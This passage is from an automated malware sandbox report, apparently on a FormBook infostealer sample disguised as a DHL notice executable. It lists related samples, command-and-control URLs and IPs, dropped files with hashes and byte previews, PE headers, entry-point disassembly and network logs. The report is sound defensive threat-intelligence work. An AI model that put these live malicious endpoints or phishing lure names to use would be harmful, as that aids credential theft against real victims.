                                                          • www.rifleroofers.com/sz08/?SR=uAyJuWYMLR&Nv=Zclp6qOkk6suDwk8L5hMqfQ8ucZ5NbrWW/mAgrca59pL6xO7GaHAahXZnPJsmMqo1Nyimqz3LU+xRBrSPPad5nyGoF9gH9ahwA==
                                                          YP_INVOICE_999785.xlsxGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/sz08/?bjHKBj=Zclp6qOkk6suDwk8JJhFqfA8qYd9I7rWW/mAgrca59pL6xO7GaHALAXFne5vnIOo19zUuK72PVyLaF3wOvvUt0afiiwWR9myvyBYvA4=&0G1OJJ=eUTeCfLVHqm
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?gszO=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCsDhv1mB7/0XFtg==&ASf8=CqpI0h
                                                          chiygf.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                          • www.rifleroofers.com/08da/?ctxXwh_=CcXvm+uGXQ5Hf6IM8VUAXWFGh8soaqp8g1DSnorCK+ihN0wfvhbOzSSdHd5LWciiROvtPOeNJ3aGUjpyjtQApDH8hsFdvmwTVA==&K-=wPcGbzFECMSws
                                                          gjvkyygg.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?Ns=Sr1AjUgE1bmYtN0hfr/w/2SgcWnTtm1Iy7x8VWFTjEXaDkIuvqWhFof+O4ddqC6+eWArdJNQDIDq/++CVSPC2zFZtnR68XnBuw==&xwND=_V84H
                                                          jkjn.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?YOLhARX=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV21ZFiFpzuHqhvw==&mukFGB=ITp1mTOl9b
                                                          njsd.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?syhgSw=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&UVr=hFKKHFRtW
                                                          REVISE COMM INVOICE_001210320.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/pp2u/?vX=9-V-SZkeib9&DAMMsn=wIanChqhJAbu5jvQ67dMSHKq9YI/1Gw5z+MM/x39vNLvaSwuWAJS6Gn4tYNBAxgt0F97QFbdvoB/V1Tallur++fMjcJ4plI7eTXShNN6rC9T
                                                          gdxb.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?PSrwg=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&ueg=97gkFFS1z
                                                          roure.exeGet hashmaliciousFormBookBrowse
                                                          • www.rifleroofers.com/hpb7/?7Dm=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCsDhv1mB7/0XFtg==&qfcU=O_tcT2

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.0dhy.xyzDHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          PUqT3VrH7u.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          gjvkyygg.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          jkjn.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          njsd.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          gdxb.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          roure.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          AS-COLOCROSSINGUSskm_03029876554.htmGet hashmaliciousHTMLPhisherBrowse
                                                          • 192.3.140.99
                                                          DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 198.46.160.97
                                                          8000107947.8000107948.8000107950.8000107951-PI_PRB20230302-1P.xlsGet hashmaliciousUnknownBrowse
                                                          • 107.174.45.14
                                                          New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                          • 23.94.99.117
                                                          8000107947.8000107948.8000107950.8000107951-PI_PRB20230302-1P.xlsGet hashmaliciousUnknownBrowse
                                                          • 107.174.45.14
                                                          TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                          • 192.3.223.30
                                                          o726x137VU.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 107.172.220.147
                                                          New_Order_Match_2023SI3.xlsGet hashmaliciousUnknownBrowse
                                                          • 23.94.99.117
                                                          https://s3.amazonaws.com/appforest_uf/f1678860752373x996056673145725700/upperheadatit.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 198.144.191.34
                                                          New_Order_Match_2023SI3.xlsGet hashmaliciousUnknownBrowse
                                                          • 23.94.99.117
                                                          RAINBOW_FAM_TRIP_0317_ROOMING_SUNBEACH.xlsGet hashmaliciousAgentTeslaBrowse
                                                          • 172.245.123.100
                                                          PI.docxGet hashmaliciousAgentTesla, zgRATBrowse
                                                          • 23.94.231.188
                                                          OUTSTANDING_BALANCE.xlsGet hashmaliciousLokibotBrowse
                                                          • 107.174.45.14
                                                          AF1TlY5QY8.rtfGet hashmaliciousAgentTeslaBrowse
                                                          • 192.3.243.151
                                                          31Fe79bgM5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 192.3.220.197
                                                          QITs3uxUL2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 192.3.220.197
                                                          k6lIkRbtm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 192.3.220.197
                                                          GPziGf3G1l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 192.3.220.197
                                                          5Za2Raps8T.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 192.3.220.197
                                                          Wu4w66Rnv5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 192.3.220.197
                                                          PRIVATESYSTEMSUSDHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          W56AioAHw2.elfGet hashmaliciousMiraiBrowse
                                                          • 209.42.231.68
                                                          https://fastwpdemo.com/sp/sp.jsGet hashmaliciousUnknownBrowse
                                                          • 170.249.194.26
                                                          PUqT3VrH7u.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          DHL_Notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          bart.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                          • 67.222.24.48
                                                          hI7ey7jFag.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          YP_INVOICE_999785.xlsxGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          DHL_Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          chiygf.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                          • 67.222.24.48
                                                          gjvkyygg.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          jkjn.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          njsd.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          REVISE COMM INVOICE_001210320.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          hesaphareketi-01.exeGet hashmaliciousFormBookBrowse
                                                          • 204.197.253.140
                                                          gdxb.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          file.exeGet hashmaliciousFabookie, ManusCrypt, Nymaim, RHADAMANTHYS, RedLine, Socelars, VidarBrowse
                                                          • 162.248.50.116
                                                          roure.exeGet hashmaliciousFormBookBrowse
                                                          • 67.222.24.48
                                                          g2mava2lnV.elfGet hashmaliciousMiraiBrowse
                                                          • 209.42.232.100

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\146E771M

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cmmon32.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\bwgyj.py

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:OpenPGP Public Key
                                                          Category:dropped
                                                          Size (bytes):209991
                                                          Entropy (8bit):7.998709566109535
                                                          Encrypted:true
                                                          SSDEEP:3072:GOVZQocPBPtCQ8T+EZ/9vRImoqPeTVKaoQQe8esYNdoytWygtFK1b2fH3HFOM0SZ:GOXQocQ+EK9TVKEYydky+XfHPpYFZG/
                                                          MD5:9203F8F38EDD3B6CEE9B5647706C4747
                                                          SHA1:9EA9A90EB73A07AC7B6710D752A1A2DCC7E0ED76
                                                          SHA-256:4B2DB80CC55681E7CD277C2DC4BD5BB67E1E4EE03F4665D214DBC9BBECCABFC8
                                                          SHA-512:0669801D821650A9AF04D35BBAEE776B2D91A09A0E4630AB7EB22C93711FE57E9FF76268953ED918CE98F8DE22AFB0C8AAEA11BDFE91CBE245743EB273C56B69
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.....7..d..ga...}7.'.G......#.,...b..... ..K.......X$.9..B..[...usn......o5..}..........l.5=C.`.{..}v.b..B.......u.w...V..v1&p...P.h!.....~.7..M......R.am..&\....P......E....t..v.?.C....7.v....Zb&o2...F8.&V...Y}Q..aI............m.`|....gR`...7.....H."@..'D..h.A).hk..hb.D... R.K3......v$.9..B..[.G...s..(...r..g.$X...b.Or.}.f..R.....Y^G....+m........w...V:..6.."...W..x...<.U...f#4=MK..!..\'..,...........E....5Y.k.?.|.:......!sv..Zb&o2......d....XQ..aI.............m.`|c...,.go`...7..d....H."@=.'D....h.A?..,...b..... ..K.......X$.9..B..[.G...s..(...r..g.$X...b.Or.}.f..R.....Y^G....+m........w...V:..6.."...W..x...<.U...f#4=MK..!..\'..,...........E....t..v.?.".......`.v.Zb&o2......d...}Q..aI.............m.`|c...,.go`...7..d....H."@=.'D....h.A?..,...b..... ..K.......X$.9..B..[.G...s..(...r..g.$X...b.Or.}.f..R.....Y^G....+m........w...V:..6.."...W..x...<.U...f#4=MK..!..\'..,...........E....t..v.?.".......`.v.Zb&o2......d...}Q..aI...

                                                          C:\Users\user\AppData\Local\Temp\nsd7F3C.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):233940
                                                          Entropy (8bit):7.852327544537286
                                                          Encrypted:false
                                                          SSDEEP:3072:2sOVZQocPBPtCQ8T+EZ/9vRImoqPeTVKaoQQe8esYNdoytWygtFK1b2fH3HFOM0N:XOXQocQ+EK9TVKEYydky+XfHPpYFZGw
                                                          MD5:CB7BDC432B7BA8C7ED8B489D5F08A081
                                                          SHA1:A58E23586ED03EBB8B0D7670383F92C80F07D9A5
                                                          SHA-256:81E2187A7CD1186869B5F492E68CBAC1EF8B404DD893EF9AC7295093C6C8C227
                                                          SHA-512:5FD7458B503BA3AE3514236B2FFBE4AEED27E651994F8C2BDC50BFCAF8A7D1E5705CF7FFDE87A7BB144B72FFA2E52F3DF97B139610C5448BA91B75312188BFFB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:./......,........................ .............../..............................................................................7...........................................................................................................................................................G...............M...j...............................................................................................................................}...........N...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\thztifyh.t

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6099
                                                          Entropy (8bit):7.134928677733547
                                                          Encrypted:false
                                                          SSDEEP:96:Farc6oY0Wg/DrYuDk2XO5oSw09LFQiY3XdQSkwKOYJ8CJZT0v81DJi6p:FarcRTrhX1SJ9LOn3tRkwtxE1D7
                                                          MD5:0A06F95BA28B6704B7DBC7F68D1B5BE4
                                                          SHA1:F1118B8640DFB7533F744FBD8CD24780D04650CD
                                                          SHA-256:4F6DAE66BA6DC6B3EBBABD57F2A4404AF38452EC3677A779D5F41A378982B0E1
                                                          SHA-512:417FB43A079FEC2A3702EA562E51A3E5EAEFD64D753302A3BC31AE867E2C50AE8D081883D247433F6A09C71C83EF09BFFF0B38942C1A14DEA3D60435E1B50688
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                          C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5632
                                                          Entropy (8bit):4.4633891846895075
                                                          Encrypted:false
                                                          SSDEEP:96:G8wZF3bluZzQb5P4oyn/7JhpywpZ6uYHrAhBPxesU8:G8UF3bY1SP4oynl/ycZ6uYHrSBwsU8
                                                          MD5:BE5A6985BCDCA9064A05D26CFB8D082E
                                                          SHA1:5EB04D667D4E5A5B453ED028083423FA810EA5C4
                                                          SHA-256:E05AF06D3928D4583C5B2B2C433B9189411EB48F39D5CBAAFED06F5CB27B3B20
                                                          SHA-512:F2EBA81E5E658E4FF486C796F90CE80B664DA91349181B901D9B8DE96D8DA85E40F389897F5AC94228F4073ABA6B4946A5728D08A5BAE720D1FB3A592F5B1050
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 27%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(.@.(.@.(.@.@.A.(.@.(.@.(.@K7.@.(.@ 4.@.(.@K7.@.(.@.v.A.(.@.v.A.(.@Rich.(.@........PE..L......d..................................... ....@..........................@...............................................".......................................!............................................... ...............................text............................... ..`.rdata..:.... ......................@..@.data........0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.905063780230514
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:DHL_Notice_pdf.exe
                                                          File size:255238
                                                          MD5:771508cf2751f6dabe05758e4fa25fdf
                                                          SHA1:f6d7d33b6a340d2c370ca31a6f9677a2e5306486
                                                          SHA256:652948efee89fdc5c6d3dc7f65a16aafabd0d224c9fcd55e5f86573f1b2c4aa1
                                                          SHA512:437bca115b12044ff08264218c4ab6546a345b5fe2e6ed89d09cbbaf51f77522afc4e9004cb88e229ee3b0687faf611d30a346b953bbd8eaba0a3ece7df4fdb8
                                                          SSDEEP:6144:/Ya6h4vRbB2TXukTFPqjpsaKncVt9l7GmmEE09z:/Yb4vRbB2Ldgjua2cplymmEE09z
                                                          TLSH:6944124847E4E0BFE4A246701DFA62BA5BF4B52E9475410B63C02B697E726B15F0F332
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                          File Icon

                                                          Icon Hash:b2a88c96b2ca6a72

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x403640
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:61259b55b8912888e90f516ca08dc514

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 000003F4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          pop edi
                                                          xor ebx, ebx
                                                          push 00008001h
                                                          mov dword ptr [ebp-14h], ebx
                                                          mov dword ptr [ebp-04h], 0040A230h
                                                          mov dword ptr [ebp-10h], ebx
                                                          call dword ptr [004080C8h]
                                                          mov esi, dword ptr [004080CCh]
                                                          lea eax, dword ptr [ebp-00000140h]
                                                          push eax
                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                          mov dword ptr [ebp-2Ch], ebx
                                                          mov dword ptr [ebp-28h], ebx
                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                          call esi
                                                          test eax, eax
                                                          jne 00007F3D28E0F87Ah
                                                          lea eax, dword ptr [ebp-00000140h]
                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                          push eax
                                                          call esi
                                                          mov ax, word ptr [ebp-0000012Ch]
                                                          mov ecx, dword ptr [ebp-00000112h]
                                                          sub ax, 00000053h
                                                          add ecx, FFFFFFD0h
                                                          neg ax
                                                          sbb eax, eax
                                                          mov byte ptr [ebp-26h], 00000004h
                                                          not eax
                                                          and eax, ecx
                                                          mov word ptr [ebp-2Ch], ax
                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                          jnc 00007F3D28E0F84Ah
                                                          and word ptr [ebp-00000132h], 0000h
                                                          mov eax, dword ptr [ebp-00000134h]
                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                          mov dword ptr [0042A318h], eax
                                                          xor eax, eax
                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                          movzx eax, ax
                                                          or eax, ecx
                                                          xor ecx, ecx
                                                          mov ch, byte ptr [ebp-2Ch]
                                                          movzx ecx, cx
                                                          shl eax, 10h
                                                          or eax, ecx

                                                          Rich Headers

                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcd0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x3b0000xcd00xe00False0.421875data4.212531507733574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                          RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                          RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                          RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                          RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                          RT_VERSION0x3b7580x234dataEnglishUnited States
                                                          RT_MANIFEST0x3b9900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                          Imports

                                                          DLLImport
                                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.38.8.8.851139532023883 03/21/23-08:08:13.337564UDP2023883ET DNS Query to a *.top domain - Likely Hostile5113953192.168.2.38.8.8.8

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 21, 2023 08:07:24.635210037 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:24.914064884 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:24.914180994 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:24.914344072 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:25.192853928 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:25.192886114 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:25.193101883 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:25.193608046 CET4969880192.168.2.31.13.186.125
                                                          Mar 21, 2023 08:07:25.470067978 CET80496981.13.186.125192.168.2.3
                                                          Mar 21, 2023 08:07:35.689584017 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:35.807986975 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.808240891 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:35.808631897 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:35.926683903 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.927187920 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.927232027 CET8049699198.46.160.97192.168.2.3
                                                          Mar 21, 2023 08:07:35.927345991 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:37.316317081 CET4969980192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.332834005 CET4970080192.168.2.3198.46.160.97
                                                          Mar 21, 2023 08:07:38.451946974 CET8049700198.46.160.97192.168.2.3
